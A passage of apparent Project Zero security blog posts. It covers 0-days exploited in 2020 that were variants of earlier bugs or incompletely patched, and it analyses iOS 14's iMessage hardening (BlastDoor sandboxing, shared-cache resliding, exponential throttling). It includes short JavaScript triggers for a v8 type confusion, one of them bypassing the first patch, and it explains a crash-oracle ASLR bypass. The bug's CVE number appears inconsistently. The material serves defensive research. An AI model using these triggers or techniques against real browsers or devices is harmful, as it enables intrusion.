CVE-2020-27930 vulnerability was used in an exploit chain for iOS. The variant, CVE-2015-0993, was reported to Microsoft in November 2014. In CVE-2015-0993, the vulnerability is in the blend operator in Microsoft’s implementation of Adobe’s Type 1/2 Charstring Font Format. The blend operation takes n + 1 parameters. The vulnerability is that it did not validate or handle correctly when n is negative, allowing the font to arbitrarily read and write on the native interpreter stack.

CVE-2020-27930, the vulnerability exploited in-the-wild in 2020, is very similar. The vulnerability this time is in the callothersubr operator in Apple’s implementation of Adobe’s Type 1 Charstring Font Format. In the same way as the vulnerability reported in November 2014, callothersubr expects n arguments from the stack. However, the function did not validate nor handle correctly negative values of n, leading to the same outcome of arbitrary stack read/write.

Six years after the original vulnerability was reported, a similar vulnerability was exploited in a different project. This presents an interesting question: How do related, but separate, projects stay up-to-date on security vulnerabilities that likely exist in their fork of a common code base? There’s little doubt that reviewing the vulnerability Microsoft fixed in 2015 would help the attackers discover this vulnerability in Apple.

Exploited 0-days not properly fixed… 😭

Three vulnerabilities that were exploited in-the-wild were not properly fixed after they were reported to the vendor.

Product

Vulnerability that was exploited in-the-wild

2nd patch

Internet Explorer

CVE-2020-0674

CVE-2020-0968

Google Chrome

CVE-2019-13764*

CVE-2020-6383

Microsoft Windows

CVE-2020-0986

CVE-2020-17008/CVE-2021-1648

* when CVE-2019-13764 was patched, it was not known to be exploited in-the-wild

Internet Explorer JScript CVE-2020-0674

In the section above, we detailed the timeline of the Internet Explorer JScript vulnerabilities that were exploited in-the-wild. After the most recent vulnerability, CVE-2020-0674, was exploited in January 2020, it still didn’t comprehensively fix all of the variants. Microsoft patched CVE-2020-0968 in April 2020. We show the trigger in the section above.

Google Chrome CVE-2019-13674

CVE-2019-13674 in Chrome is an interesting case. When it was patched in November 2019, it was not known to be exploited in-the-wild. Instead, it was reported by security researchers Soyeon Park and Wen Xu. Three months later, in February 2020, Sergei Glazunov of Project Zero discovered that it was exploited in-the-wild, and may have been exploited as a 0-day prior to the patch. When Sergei realized it had already been patched, he decided to look a little closer at the patch. That’s when he realized that the patch didn’t fix all of the paths to trigger the vulnerability. To read about the vulnerability and the subsequent patches in greater detail, check out Sergei’s blog post, “Chrome Infinity Bug”.

To summarize, the vulnerability is a type confusion in Chrome’s v8 Javascript engine. The issue is in the function that is designed to compute the type of induction variables, the variable that gets increased or decreased by a fixed amount in each iteration of a loop, such as a for loop. The algorithm works only on v8’s integer type though. The integer type in v8 includes a few special values, +Infinity and -Infinity. -0 and NaN do not belong to the integer type though. Another interesting aspect to v8’s integer type is that it is not closed under addition meaning that adding two integers doesn’t always result in an integer. An example of this is +Infinity + -Infinity = NaN.

Therefore, the following line is sufficient to trigger CVE-2019-13674. Note that this line will not show any observable crash effects and the road to making this vulnerability exploitable is quite long, check out this blog post if you’re interested!

for (var i = -Infinity; i < 0; i += Infinity) { }

The patch that Chrome released for this vulnerability added an explicit check for the NaN case. But the patch made an assumption that leads to it being insufficient: that the loop variable can only become NaN if the sum or difference of the initial value of the variable and the increment is NaN. The issue is that the value of the increment can change inside the loop body. Therefore the following trigger would still work even after the patch was applied.

var increment = -Infinity;

var k = 0;

// The initial loop value is 0 and the increment is -Infinity.

// This is permissible because 0 + -Infinity = -Infinity, an integer.

for (var i = 0; i < 1; i += increment) {

  if (i == -Infinity) {

    // Once the initial variable equals -Infinity (one loop through)

   // the increment is changed to +Infinity. -Infinity + +Infinity = NaN

    increment = +Infinity;

  }

  if (++k > 10) {

    break;

  }

}

To “revive” the entire exploit, the attacker only needed to change a couple of lines in the trigger to have another working 0-day. This incomplete fix was reported to Chrome in February 2020. This patch was more conservative: it bailed as soon as the type detected that increment can be +Infinity or -Infinity.

Unfortunately, this patch introduced an additional security vulnerability, which allowed for a wider choice of possible “type confusions”. Again, check out Sergei’s blog post if you’re interested in more details.

This is an example where the exploit is found after the bug was initially reported by security researchers. As an aside, I think this shows why it’s important to work towards “correct & comprehensive” patches in general, not just vulnerabilities known to be exploited in-the-wild. The security industry knows there is a detection gap in our ability to detect 0-days exploited in-the-wild. We don’t find and detect all exploited 0-days and we certainly don’t find them all in a timely manner.

Windows splwow64 CVE-2020-0986

This vulnerability has already been discussed in the previous section on variants. After Kaspersky reported that CVE-2020-0986 was actively exploited as a 0-day, I began performing root cause analysis and variant analysis on the vulnerability. The vulnerability was patched in June 2020, but it was only disclosed as exploited in-the-wild in August 2020.

Microsoft’s patch for CVE-2020-0986 replaced the raw pointers that an attacker could previously send through the LPC message, with offsets. This didn’t fix the root cause vulnerability, just changed how an attacker would trigger the vulnerability. This issue was reported to Microsoft in September 2020, including a working trigger. Microsoft released a more complete patch for the vulnerability in January 2021, four months later. This new patch checks that all memcpy operations are only reading from and copying into the buffer of the message.

Correct and comprehensive patches

We’ve detailed how six 0-days that were exploited in-the-wild in 2020 were closely related to vulnerabilities that had been seen previously. We also showed how three vulnerabilities that were exploited in-the-wild were either not fixed correctly or not fixed comprehensively when patched this year.

When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that, we need correct and comprehensive fixes.

Being able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done. 

Exactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.

While the aim is that one day all vulnerabilities will be fixed correctly and comprehensively, each step we take in that direction will make it harder for attackers to exploit 0-days.

In 2021, Project Zero will continue completing root cause and variant analyses for vulnerabilities reported as in-the-wild. We will also be looking over the patches for these exploited vulnerabilities with more scrutiny. We hope to also expand our work into variant analysis work on other vulnerabilities as well. We hope more researchers will join us in this work. (If you’re an aspiring vulnerability researcher, variant analysis could be a great way to begin building your skills! Here are two conference talks on the topic: my talk at BluehatIL 2020 and Ki Chan Ahn at OffensiveCon 2020.)

In addition, we would really like to work more closely with vendors on patches and mitigations prior to the patch being released. We often have ideas of how issues can be addressed. Early collaboration and offering feedback during the patch design and implementation process is good for everyone. Researchers and vendors alike can save time, resources, and energy by working together, rather than patch diffing a binary after release and realizing the vulnerability was not completely fixed.

A Look at iMessage in iOS 14

Posted By Samuel Groß, Project Zero

On December 20, Citizenlab published “The Great iPwn”, detailing how “Journalists [were] Hacked with Suspected NSO Group iMessage ‘Zero-Click’ Exploit”. Of particular interest is the following note: “We do not believe that [the exploit] works against iOS 14 and above, which includes new security protections''. Given that it is also now almost exactly one year ago since we published the Remote iPhone Exploitation blog post series, in which we described how an iMessage 0-click exploit can work in practice and gave a number of suggestions on how similar attacks could be prevented in the future, now seemed like a great time to dig into the security improvements in iOS 14 in more detail and explore how Apple has hardened their platform against 0-click attacks.

The content of this blog post is the result of a roughly one-week reverse engineering project, mostly performed on a M1 Mac Mini running macOS 11.1, with the results, where possible, verified to also apply to iOS 14.3, running on an iPhone XS. Due to the nature of this project and the limited timeframe, it is possible that I have missed some relevant changes or made mistakes interpreting some results. Where possible, I’ve tried to describe the steps necessary to verify the presented results, and would appreciate any corrections or additions.

The blog post will start with an overview of the major changes Apple implemented in iOS 14 which affect the security of iMessage. Afterwards, and mostly for the readers interested in the technical details, each of the major improvements is described in more detail while also providing a walkthrough of how it was reverse engineered. At least for the technical details, it is recommended to briefly review the blog post series from last year for a basic introduction to iMessage and the exploitation techniques used to attack it.

Overview

Memory corruption based 0-click exploits typically require at least the following pieces:

  1. A memory corruption vulnerability, reachable without user interaction and ideally without triggering any user notifications
  2. A way to break ASLR remotely
  3. A way to turn the vulnerability into remote code execution
  4. (Likely) A way to break out of any sandbox, typically by exploiting a separate vulnerability in another operating system component (e.g. a userspace service or the kernel)

With iOS 14, Apple shipped a significant refactoring of iMessage processing, and made all four parts of the attack harder. This is mainly due to three central changes:

1. The BlastDoor Service

One of the major changes in iOS 14 is the introduction of a new, tightly sandboxed “BlastDoor” service which is now responsible for almost all parsing of untrusted data in iMessages (for example, NSKeyedArchiver payloads). Furthermore, this service is written in Swift, a (mostly) memory safe language which makes it significantly harder to introduce classic memory corruption vulnerabilities into the code base.

The following diagram shows the rough new iMessage processing pipeline, with the name of the respective service process shown at the top of each box.

The iMessage processing pipeline in iOS 14 and macOS Big Sur. An iMessage arrives in apsd as a push notification from Apple’s servers. From there, it is first passed to identityservicesd, which decrypts its payload using the local iMessage private key, then to imagent. Imagent then delegates the majority of the parsing work to the BlastDoor service. Afterwards, if the iMessage contains any attachments, they are downloaded from iCloud servers by IMTransferAgent. If the iMessage contains plugin data (such as a URL with a preview image), the serialized plugin data is again processed by the BlastDoor service and a preview message is generated from it. Finally, IMDPersistenceAgent stores the iMessage into the messages database, triggers a user notification, and returns to imagent, which sends the delivery receipt to the iMessage servers and thus to the sender.

As can be seen, the majority of the processing of complex, untrusted data has been moved into the new BlastDoor service. Furthermore, this design with its 7+ involved services allows fine-grained sandboxing rules to be applied, for example, only the IMTransferAgent and apsd processes are required to perform network operations. As such, all services in this pipeline are now properly sandboxed (with the BlastDoor service arguably being sandboxed the strongest).

2. Re-randomization of the Dyld Shared Cache Region

Historically, ASLR on Apple’s platforms had one architectural weakness: the shared cache region, containing most of the system libraries in a single prelinked blob, was only randomized per boot, and so would stay at the same address across all processes. This turned out to be especially critical in the context of 0-click attacks, as it allowed an attacker, able to remotely observe process crashes (e.g. through timing of automatic delivery receipts), to infer the base address of the shared cache and as such break ASLR, a prerequisite for subsequent exploitation steps.

However, with iOS 14, Apple has added logic to specifically detect this kind of attack, in which case the shared cache is re-randomized for the targeted service the next time it is started, thus rendering this technique useless. This should make bypassing ASLR in a 0-click attack context significantly harder or even impossible (apart from brute force) depending on the concrete vulnerability.

3. Exponential Throttling to Slow Down Brute Force Attacks

To limit an attacker’s ability to retry exploits or brute force ASLR, the BlastDoor and imagent services are now subject to a newly introduced exponential throttling mechanism enforced by launchd, causing the interval between restarts after a crash to double with every subsequent crash (up to an apparent maximum of 20 minutes). With this change, an exploit that relied on repeatedly crashing the attacked service would now likely require in the order of multiple hours to roughly half a day to complete instead of a few minutes.

The remainder of this blog post will now look at each of these three changes in greater depths.

The BlastDoor Service

The new BlastDoor service and its role in the processing of iMessages can be studied by following the flow of an incoming iMessage. On the wire, a simple text iMessage would look something like this, encoded as binary plist:

{

    // Group UUID

    gid = "008412B9-A4F7-4B96-96C3-70C4276CB2BE";

    // Group protocol version

    gv = 8;

    // Chat participants

    p =     (

        "mailto:[email protected]",

        "mailto:[email protected]"

    );

    // Participants version

    pv = 0;

    // Message being replied to, usually the last message in the chat 

    r = "6401430E-CDD3-4BC7-A377-7611706B431F";

    // The plain text content

    t = "Hello World!";

    // Probably some other version number

    v = 1;

    // The rich text content    

    x = "<html><body>Hello World!</body></html>";  

}

As such, the minimal steps required to parse it are:

  1. If necessary, decompress the binary data
  2. Decode the plist from its binary serialization format
  3. Extract its various fields and ensure they have the correct type
  4. Decode the `x` key if present, using an XML decoder

Previously, all of this work happened in imagent. With iOS 14, however, it all moved into the new BlastDoor service. While the main processing flow still starts in imagent, which receives the raw but unencrypted payload bytes from identityservicesd (part of the IDS framework) in -[IMDiMessageIDSDelegate service:account:incomingTopLevelMessage:fromID:messageContext:], messages are then more or less immediately forwarded to the BlastDoor service through +[IMBlastdoor sendDictionary:withCompletionBlock:] which creates the reply handler block and then calls -[IMMessagesBlastDoorInterface diffuseTopLevelDictionary:resultHandler:]. At that point processing ends up in Swift code that deserializes the binary payload and sends it to the BlastDoor service over XPC.

Inside BlastDoor, the work mostly happens in BlastDoor.framework and MessagesBlastDoorService. As most of it is written in Swift, it is fairly unpleasant to statically reverse engineer it (no symbols, many virtual calls, swift runtime code sprinkled all over the place), but fortunately, that is also not really necessary for the purpose of this blog post. However, it is worth noting that while the high level control flow logic is written in Swift, some of the parsing steps still involve the existing ObjectiveC or C implementations. For example, XML is being parsed by libxml, and the NSKeyedArchiver payloads by the ObjectiveC implementation of NSKeyedUnarchiver.

The responses from BlastDoor can be seen by breaking on the reply handler function in imagent (the function can be found in +[IMBlastdoor sendDictionary:withCompletionBlock:] or by searching for XREFs to the string “Blastdoor response %p received (command: %hhu, guid: %@)” in IMDaemonCore.framework). A typical BlastDoor response for a simple text message is shown below:

(lldb) po $x2

TextMessage(

    metadata: BlastDoor.Metadata(

        messageGUID: D391CC96-9CC6-44C6-B827-1DEB0F252529,

        timestamp: Optional(1610108299117662350),

        wantsDeliveryReceipt: true,

        wantsCheckpointing: false,

        storageContext: BlastDoor.Metadata.StorageContext(

            isFromStorage: false, isLastFromStorage: false

        )

    ),

    messageSubType: MessageType.textMessage(BlastDoor.Message(

        plainTextBody: Optional("Hello World"),

        plainTextSubject: nil,

        content: Optional(BlastDoor.AttributedString(

            attributes: [

                BlastDoor.BaseWritingDirectionAttribute(

                    range: Range(0..<11), direction: WritingDirection.natural

                ),

                BlastDoor.MessagePartAttribute(

                    range: Range(0..<11), partNumber: 0

                )

            ],

            string: "Hello World"

        )),

        _participantDestinationIdentifiers: [

            "mailto:[email protected]",

            "mailto:[email protected]"

        ],

        attributionInfo: []

    )),

    encryptionType: BlastDoor.TextMessage.EncryptionType.pair_ec,

    replyToGUID: Optional(6401430E-CDD3-4BC7-A377-7611706B431F),

    _threadIdentifierGUID: nil,

    _expressiveSendStyleIdentifier: nil,

    _groupID: Optional("008412B9-A4F7-4B96-96C3-70C4276CB2BE"),

    currentGroupName: nil,

    groupParticipantVersion: Optional(0),

    groupProtocolVersion: Optional(8),

    groupPhotoCreationTime: nil,

    messageSummaryInfo: nil,

    nicknameInformation: nil,

    truncatedNicknameRecordKey: nil

)

One can roughly associate every field in this data structure with parts of the on-wire iMessage format. For example, the plainTextBody field contains the content of the `t` field, while the content field corresponds to the content of the `x` field.

Besides simple text messages, iMessages can additionally contain attachments (essentially arbitrary files which are encrypted and temporarily uploaded to iCloud) as well as rather complex serialized NSKeyedArchiver archives, which have been the source of bugs in the past.

For these types of iMessages, the following additional parsing steps are necessary:

  1. Unpack attachment metadata (NSKeyedArchiver format)
  2. Download attachments from iCloud server
  3. Deserialize NSKeyedArchiver plugin archives and generate a preview for the notification

As an example, consider what happens when a user sends a link to a website over iMessage. In that case, the sending device will first render a preview of the webpage and collect some metadata about it (such as the title and page description), then pack those fields into an NSKeyedArchiver archive. This archive is then encrypted with a temporary key and uploaded to the iCloud servers. Finally, the link as well as the decryption key are sent to the receiver as part of the iMessage. In order to create a useful user notification about the incoming iMessage, this data has to be processed by the receiver on a 0-click code path. As that again involves a fair amount of complexity, it is also done inside BlastDoor: after receiving the BlastDoor reply from above and realizing that the message contains an attachment, imagent first instructs IMTransferAgent to download and decrypt the iCloud attachment. Afterwards, it will call into -[IMTranscodeController decodeiMessageAppPayload:bundleID:completionBlock:blockUntilReply:] which forwards the relevant data to the IMTranscoderAgent, which then proceeds into +[IMAttachmentBlastdoor sendBalloonPluginPayloadData:withBundleIdentifier:completionBlock:] and finally calls -[IMMessagesBlastDoorInterface defuseBalloonPluginPayload:withIdentifier:resultHandler:].

In the BlastDoor service, the plugin data decoding is then again performed in Swift, and dispatched to the corresponding plugin type, as determined by the plugin id. For RichLinks (plugin id com.apple.messages.URLBalloonProvider), processing ends up in LinkPresentation.MessagesPayload.init(dataRepresentation:), which deserializes the NSKeyedArchiver payload and to extract the preview image and URL metadata from it in order to generate a preview message.

Sandboxing

The sandbox profile can be found in System/Library/Sandbox/Profiles/blastdoor.sb and is also attached at the end of this blog post. It appears to be identical on iOS and macOS. The profile can be studied statically, and for that purpose is attached at the bottom of this blogpost, or dynamically, for example by using the sandbox-exec tool:

> echo "(allow process-exec (literal \"$(pwd)/test\"))" >> ./blastdoor.sb

> clang -o test test.c   # try to open files, network connections, etc.

> sandbox-exec -f ./blastdoor.sb ./test

The sandbox profile states:

;;; This profile contains the rules necessary to make BlastDoor as close to

;;; compute-only as possible, while still remaining functional.

And indeed, the sandbox profile is quite tight:

  • only a handful of local IPC services, namely diagnosticd, logd, opendirectoryd, syslogd, and notifyd, can be reached
  • almost all file system interaction is blocked
  • any interaction with IOKit drivers (historically a big source of vulnerabilities) is forbidden
  • outbound network access is denied

Furthermore, the profile makes use of syscall filtering to restrict the interactions with the core kernel. However, as of now the syscall filter seems to be in “permissive” mode:

;; To be uncommented once the system call whitelist is complete...

;; (deny syscall-unix (with send-signal SIGKILL))

As such, the BlastDoor service is still allowed to perform any syscall, but it is to be expected that the syscall filtering will soon be put into “enforcement mode”, which would further boost its effectiveness.

Crash Monitoring?

An interesting side effect of the new processing pipeline is that imagent is now able to detect when an incoming message caused a crash in BlastDoor (it will receive an XPC error). Even more interesting is the fact that imagent appears to be informing Apple’s servers about such events, as can be seen by setting a breakpoint on -[APSConnectionServer handleSendOutgoingMessage:] in apsd, the daemon responsible for implementing Apple’s push services (on top of which iMessage is built). Displaying the outgoing message will show the following:

(lldb) po [$x2 dictionaryRepresentation]

{

    APSCritical = 1;

    APSMessageID = 543;

    APSMessageIdentifier = 1520040396;

    APSMessageTopic = "com.apple.madrid";

    APSMessageUserInfo =     {

        c = 115;

        fR = 13500;

        fRM = "c-100-BlastDoor.Explosion-1-com.apple.BlastDoor.XPC-ServiceCrashed";

        fU = {length = 16, bytes = 0x3a4912626c9645f98cb26c7c2d439520};

        i = 1520040396;

        nr = 1;

        t = {length = 32, bytes = ... };

        ua = "[macOS,11.1,20C69,Macmini9,1]";

        v = 7;

    };

    APSOutgoingMessageSenderTokenName = 501;

    APSPayloadFormat = 1;

    APSTimeout = 120;

    APSTimestamp = "2021-01-06 19:52:10 +0000";

}

As can be seen, imagent is apparently informing the iMessage servers that the message with the UUID 0x3a4912626c9645f98cb26c7c2d439520 (fU key) has caused a crash in BlastDoor.

It is unclear what the purpose of this is without access to the server’s code. While these notifications may simply be used for statistical purposes, they would also give Apple a fairly clear signal about attacks against iMessage involving brute-force and a somewhat weaker signal about any failed exploits against the BlastDoor service.

In my experiments, after observing one of these crash notifications, the server would start directly sending delivery receipts to the sender for messages that hadn't actually been processed by the receiver yet. Possibly this is another, independent effort to break the crash oracle technique by confusing the sender, but that is hard to verify without access to the code running on the server. In any case, it is worth noting that this “spoofing” of delivery receipts by the server is generally possible as the message UUID, which is more or less the only content of a delivery receipt, is part of the non-end2end encrypted payload and is thus known to the server (break on -[APSConnectionServer handleSendOutgoingMessage:] and inspect outgoing iMessages to verify this, the UUID will be in the U key, while the e2e-encrypted data will be in the P key). This is most likely necessary so the server can track which messages have already been delivered and which ones it still needs to keep around for delivery in the future.

Shared Cache Resliding

Previously, when exploiting an iMessage memory corruption bug, a “crash oracle” could be used to reveal the location of the shared cache region in memory: the attacker would trigger the memory corruption bug in a way that would cause an access to a memory location somewhere in the region 0x180000000 - 0x280000000 (where the shared cache can be mapped). If the memory was valid, no crash would occur and imagent would then send a delivery receipt to the attacker. However, If a crash occurred, no such receipt would be delivered, informing the attacker that the address was unmapped. Through clever selection of the queried addresses, the location of the shared cache could be revealed in logarithmic time, with only about 20 messages.

However, with iOS 14 Apple has added a mechanism to re-randomize the location of the shared cache region for an “attacked” process, thus breaking a fundamental assumption of this technique and rendering it ineffective. This is significant as the crash oracle technique was one of very few, if not the only, fairly generic ASLR bypass techniques usable in 0-click iMessage attacks.

To understand how the shared cache resliding works, one can start by looking at the kernel. In iOS 14, the kernel can now have two active shared cache regions: the “regular” region and a “reslided” region. During an attack, the following then happens:

  1. When an attacker attempts to use a crash-oracle-based technique, the attacked process would quickly end up accessing unmapped memory in the range 0x180000000 - 0x280000000 (where the shared cache is mapped) and crashes
  2. The kernel handles the segmentation fault generated by the CPU, and sets a specific flag in the crash info that signals that the crash happened inside the shared cache region
  3. At the same time, the kernel will mark the currently active reslided shared cache region (if one exists) as stale, causing it to be recreated and thus re-randomized the next time it is used
  4. launchd (as the parent process of the crashed service) receives the crash info, notices the OS_REASON_FLAG_SHAREDREGION_FAULT flag, and sets the ReslideSharedCache property on the service associated with the crashed process (see `launchctl procinfo $pid` and search for `reslide shared cache = 1`)
  5. The next time the service is restarted, launchd then adds the POSIX_SPAWN_RESLIDE attribute for posix_spawn due to the ReslideSharedCache property
  6. In the kernel, this flag now causes the newly created process to be given the reslided shared cache image. However, as no active reslided region currently exists (the previous one was marked as stale in step 3.), a new one is created at a newly randomized address.

The result of this is that whenever an attacker attempts to use a crash-oracle to break ASLR, the attacked service would receive a different shared cache region every time it is launched, thus preventing the attack from succeeding. For the time being, this feature appears to only be active on iOS though, but it would be expected to come to macOS as well.

While this mechanism would in principle also protect 3rd party apps from similar attacks, protection for those is currently somewhat weaker, likely in order to first evaluate the real-world performance impact of this change (the shared cache is a significant performance optimization of the OS). In particular, step 3 is currently only performed if the crashing process is a platform binary (essentially binaries that ship with the OS and are directly signed by Apple) such as the services handling iMessages. However, for 3rd party processes, it would only happen if the global vm_shared_region_reslide_restrict is set to zero:

/*

 * Flag to control what processes should get shared cache randomize resliding

 * after a fault in the shared cache region:

 *

 * 0 - all processes get a new randomized slide

 * 1 - only platform processes get a new randomized slide

 */

Which is controlled by the vm_shared_region_reslide_restrict bootarg. This currently seems to be set to one. In essence, for 3rd party apps this means:

  1. When the attacked process first crashes, the kernel will still set the OS_REASON_FLAG_SHAREDREGION_FAULT flag, and launchd will add the ReslideSharedCache property, but the current reslided region won’t be invalidated
  2. The restarted service is then restarted and now uses the “reslided” shared cache region
  3. When the service crashes the next time, and if that service is the only one currently using the reslided shared cache region (which should usually be the case, but could possibly be influenced by the attacker), the region’s refcount drops to zero, and the shared cache region is marked for removal.
  4. However, removal will only actually happen after two minutes. As such, if the service is restarted within two minutes, it will receive the same shared cache region at the same location in memory.

As a result, a third-party app could still be attacked through a crash-oracle technique if it automatically sends some form of delivery receipt to the sender and restarts quickly enough after a crash. This could, however, be prevented for example by enabling ExponentialThrottling for these services. Ideally, and assuming that the performance penalty is reasonable, Apple would enable re-randomization for all apps in the future.

Exponential Throttling

Another thing we suggested back in 2019 was to limit the number of attempts an attacker gets when attempting to exploit a vulnerability. This was mostly important to defend against the crash-oracle technique, but would also help to prevent brute force attacks (e.g., given enough attempts, one could simply brute force the location of the shared cache region). The new ExponentialThrottling feature in launchd seems to achieve just that.

To use it, a system daemon or agent has to opt-in by setting "_ExponentialThrottling = 1” in its Info.plist (essentially the service metadata), as can be seen below for the BlastDoor service:

> plutil -p /System/Library/PrivateFrameworks/MessagesBlastDoorSupport.framework/Versions/A/XPCServices/MessagesBlastDoorService.xpc/Contents/Info.plist

{

  "CFBundleDisplayName" => "MessagesBlastDoorService"

  "CFBundleExecutable" => "MessagesBlastDoorService"

  "CFBundleIdentifier" => "com.apple.MessagesBlastDoorService"

  ...

  "XPCService" => {

    "_ExponentialThrottling" => 1

  }

}

Apart from the BlastDoor service, it is also used for imagent:

> plutil -p /System/Library/LaunchAgents/com.apple.imagent.plist

{

  "_ExponentialThrottling" => 1

  ...

but doesn’t appear to be used for any other service, as can, for example, be seen by looking at the output of the launchctl dumpstate command, which will only show “exponential throttling = 1” for com.apple.imagent and com.apple.MessagesBlastDoorService.

Presumably, the _ExponentialThrottling property instructs launchd (the macOS and iOS init process), to delay subsequent restarts of a crashing service. While it is somewhat challenging to statically reverse engineer launchd due to the lack of source code or binary symbols, it is fortunately fairly easy to experimentally determine the impact of the _ExponentialThrottling property, for example by installing a custom daemon that writes the current timestamp to a file before crashing. By default, so without ExponentialThrottling, one would see the following:

Service started on Wed Jan  6 13:56:03 2021

Service started on Wed Jan  6 13:56:13 2021

Service started on Wed Jan  6 13:56:23 2021

Service started on Wed Jan  6 13:56:33 2021

As can be seen, by default, a service is, at the earliest, restarted ten seconds after it was previously started. However, using the following service plist which enables ExponentialThrottling:

> # Start service with

> # launchctl bootstrap system /Library/LaunchDaemons/net.saelo.test.plist

> plutil -p /Library/LaunchDaemons/net.saelo.test.plist

{

  "_ExponentialThrottling" => 1

  "KeepAlive" => 1

  "Label" => "net.saelo.test"

  "POSIXSpawnType" => "Interactive"

  "Program" => "/path/to/program"

}

One can observe the following:

Service started on Wed Jan  6 10:42:43 2021

Service started on Wed Jan  6 10:42:53 2021 (+10s)

Service started on Wed Jan  6 10:43:03 2021 (+10s)

Service started on Wed Jan  6 10:43:13 2021 (+10s)

Service started on Wed Jan  6 10:43:33 2021 (+20s)

Service started on Wed Jan  6 10:44:13 2021 (+40s)

Service started on Wed Jan  6 10:45:33 2021 (+80s)

Service started on Wed Jan  6 10:48:13 2021 (+160s [~2.5m])

Service started on Wed Jan  6 10:53:33 2021 (+320s [~5m])

Service started on Wed Jan  6 11:04:13 2021 (+640s [~10m])

Service started on Wed Jan  6 11:24:13 2021 (+20m)

Service started on Wed Jan  6 11:44:13 2021 (+20m)

Service started on Wed Jan  6 12:04:13 2021 (+20m)

Here, the exponential increase in the time between subsequent restarts is clearly visible, and goes up to an apparent maximum of 20 minutes. And indeed, launchd does contain the following bit of code in a function presumably responsible for computing the next restart delay (search for XREFs to the string "%s: service throttled by %llu seconds"):

  if ( delay >= 1200 )

    result = 1200LL;                 // 20 minutes

  else

    result = delay;

With this change, an exploit that relied on brute force would now only get one attempt every 20 minutes instead of every 10 seconds.

(Upcoming?) ObjectiveC ISA PAC

The PoC exploit against iMessage on iOS 12.4 relied heavily on faking ObjectiveC objects to gain a form of arbitrary code execution despite the presence of pointer authentication (PAC). This was mainly possible because the ISA field, containing the pointer to the Class object and thus making a piece of memory appear like a valid ObjectiveC object, was not protected through PAC and could thus be faked. With iOS 14, this now seems to be changing: while previously, the top 19 bits of the ISA value contained the inline refcount, it now appears that this field has been reduced to 9 bits (of which the LSB appears to be reserved for some purpose, leaving an 8-bit inline refcount, see the bit shifting logic in objc_release or objc_retain), while the freed-up bits now hold a PAC, as can be seen in objc_rootAllocWithZone in libobjc.dylib:

    ; Allocate the object

    BL              j__calloc_3

    CBZ             X0, loc_1953DA434

    MOV             X8, X0

    ; “Tag” the address with a constant to get a PAC modifier value

    MOVK            X8, #0x6AE1,LSL#48        

    MOV             X9, X19

    ; Compute PAC of Class pointer with tagged object address as modifier

    PACDA           X9, X8

    ; Clear top 9 bits (inline refcnt) and bottom 3 bits (other bitfields)       

    AND             X8, X9, #0x7FFFFFFFFFFFF8

    ; Set LSB and inline refcount to one

    MOV             X9, #0x100000000000001

    ORR             X9, X8, X9

    ; Presumably, the refcnt isn’t used for all types of classes...

    TST             W20, #0x2000

    CSEL            X8, X9, X8, EQ

    ; Store the resulting value into the ISA field

    STR             X8, [X0]

However, currently the ISA PAC appears to never be checked, as such, it doesn’t yet affect any exploits. The most likely reason for this is that the ISA PAC feature is being rolled out in multiple phases, with the current implementation meant to allow in-depth performance evaluation, in particular of the reduced size of the inline refcount, which will likely cause more objects to use the more expensive out-of-line refcounting (used once the inline refcount saturates). With that, it can be expected that, in the absence of major performance issues, future releases of iOS and macOS will use PAC for the ObjC ISA field, thus likely breaking exploits that have to rely on faking ObjectiveC objects to achieve arbitrary code execution.

Conclusion

This blog post discussed three improvements in iOS 14 affecting iMessage security: the BlastDoor service, resliding of the shared cache, and exponential throttling. Overall, these changes are probably very close to the best that could’ve been done given the need for backwards compatibility, and they should have a significant impact on the security of iMessage and the platform as a whole. It’s great to see Apple putting aside the resources for these kinds of large refactorings to improve end users’ security. Furthermore, these changes also highlight the value of offensive security work: not just single bugs were fixed, but instead structural improvements were made based on insights gained from exploit development work.

As for the alleged NSO iMessage exploit, it may have been prevented from working against iOS 14 by any of the following:

  • The bug was fixed in iOS 14, for example due to the rewrite of large parts of the iMessage processing pipeline in Swift
  • The mere fact that processing happens in a different process, which could for example break a heap layouting primitive
  • The shared cache resliding would break their exploit if their exploit relied on some form of crash oracle to break ASLR
  • The stronger sandbox of the BlastDoor service, which could prevent the exploitation of a privilege escalation vulnerability after compromising the BlastDoor process

While these are some possible scenarios, and it could be the case that the exploit “just” needs some re-engineering to function again, the fact that these security improvements were shipped is certainly a positive outcome.

Attachment 1: blastdoor.sb

;;; This profile contains the rules necessary to make BlastDoor as close to

;;; compute-only as possible, while still remaining functional.

;;;

;;; For all platforms: /System/Library/PrivateFrameworks/MessagesBlastDoorSupport.framework/XPCServices/MessagesBlastDoorService.xpc/MessagesBlastDoorService

(version 1)

;;; -------------------------------------------------------------------------------------------- ;;;

;;; Basic Rules

;;; -------------------------------------------------------------------------------------------- ;;;

;; Deny all default rules.

(deny default)

(deny file-map-executable process-info* nvram*)

(deny dynamic-code-generation)

;; Rules copied from system.sb. Ones that we've deemed overly permissive

;; or unnecessary for BlastDoor have been removed.

;; Allow read access to standard system paths.

(allow file-read*

       (require-all (file-mode #o0004)

                    (require-any (subpath "/System")

                                 (subpath "/usr/lib")

                                 (subpath "/usr/share")

                                 (subpath "/private/var/db/dyld"))))

(allow file-map-executable

       (subpath "/System/Library/CoreServices/RawCamera.bundle")

       (subpath "/usr/lib")

       (subpath "/System/Library/Frameworks"))

(allow file-test-existence (subpath "/System"))

(allow file-read-metadata

       (literal "/etc")

       (literal "/tmp")

       (literal "/var")

       (literal "/private/etc/localtime"))

;; Allow access to standard special files.

(allow file-read*

       (literal "/dev/random")

       (literal "/dev/urandom"))

(allow file-read* file-write-data

       (literal "/dev/null")

       (literal "/dev/zero"))

(allow file-read* file-write-data file-ioctl

       (literal "/dev/dtracehelper"))

;; TODO: Don't allow core dumps to be written out unless this is on a dev

;; fused device?

(allow file-write*

       (require-all (regex #"^/cores/")

                    (require-not (file-mode 0))))

;; Allow IPC to standard system agents.

(allow mach-lookup

       (global-name "com.apple.diagnosticd")

